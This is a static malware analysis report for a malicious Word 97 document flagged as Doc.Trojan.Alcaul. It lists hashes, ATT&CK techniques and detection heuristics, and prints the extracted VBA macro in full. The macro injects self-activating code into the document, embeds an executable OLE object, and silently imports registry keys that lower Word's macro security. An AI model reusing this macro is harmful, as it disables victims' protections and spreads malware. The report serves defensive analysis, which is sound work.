Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 392dc17f42121188…

MALICIOUS

Office (OLE)

34.5 KB Created: 1998-03-28 22:38:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 28d04758c604248dbeb3a32d54966258 SHA-1: 25f9eed3728279961039ee1e042383e7a93552c4 SHA-256: 392dc17f421211884a6d141439593d3c350286c7fddf9dc549a39d847ed98da0
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1204.002 Malicious File T1137.001 DLL Search Order Hijacking

The VBA macro executes a Document_Open subroutine which writes a script to 'c:\xploit.txt', then attempts to insert this script into the current document's VBA project. It also adds an OLE object 'c:\click2X.com' and modifies registry keys to lower Word's macro security settings, enabling further execution. Finally, it executes 'regedit /s c:\vv.reg' to apply these changes.

Heuristics 5

  • ClamAV: Doc.Trojan.Alcaul-21 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Alcaul-21
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1499 bytes
SHA-256: ee19a7af7ecdf5dfea3438fc2f445aea5a43dadce15d2463fad091f456b2ec14
Detection
ClamAV: Win.Trojan.Alcaul-20
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub document_close()
On Error Resume Next
Open "c:\xploit.txt" For Output As 2
Print #2, "sub document_open()"
Print #2, "On Error Resume Next"
Print #2, "'by alcopaul"
Print #2, "obj = ActiveDocument.Shapes(1).OLEFormat.ClassType"
Print #2, "With ActiveDocument.Shapes(1).OLEFormat"
Print #2, "    .ActivateAs ClassType:=obj"
Print #2, "    .Activate"
Print #2, "End With"
Print #2, "end sub"
Close 2
Set fso = CreateObject("Scripting.FileSystemObject")
Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\xploit.txt", 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
ActiveDocument.Shapes.AddOLEObject _
FileName:="c:\click2X.com", _
LinkToFile:=False
ActiveDocument.Save
Open "c:\vv.reg" For Output As 3
Print #3, "REGEDIT4"
Print #3, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #3, """Level""=dword:00000001"
Print #3, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #3, """Level""=dword:00000001"
Print #3, """AccessVBOM""=dword:00000001"
Close 3
Shell "regedit /s c:\vv.reg", vbHide
Kill "c:\vv.reg"
End Sub